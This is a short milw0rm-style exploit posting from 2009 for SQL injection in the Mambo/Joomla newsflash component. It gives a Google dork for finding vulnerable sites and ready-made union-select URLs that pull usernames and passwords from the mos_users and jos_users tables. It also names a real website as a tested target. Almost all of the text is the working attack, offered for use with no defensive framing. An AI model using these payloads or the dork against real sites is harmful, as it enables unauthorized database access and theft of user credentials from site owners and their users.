#Joomla newsflash Sql injection# ######################################## #[~] Author : EcHoLL #[~] www.warezturk.org www.tahribat.com #[~] Greetz : Black_label TURK Godlike Nitrous #[!] Module_Name: newsflash #[!] Script_Name: mambo and joomla #[!] Google_Dork: inurl:"com_newsflash" ######################################## sqlcode:index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0 mambo target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0 joomla target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+jos_users&catid=0 tested page http://www.flairsoft.net/main/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0 # milw0rm.com [2009-01-11]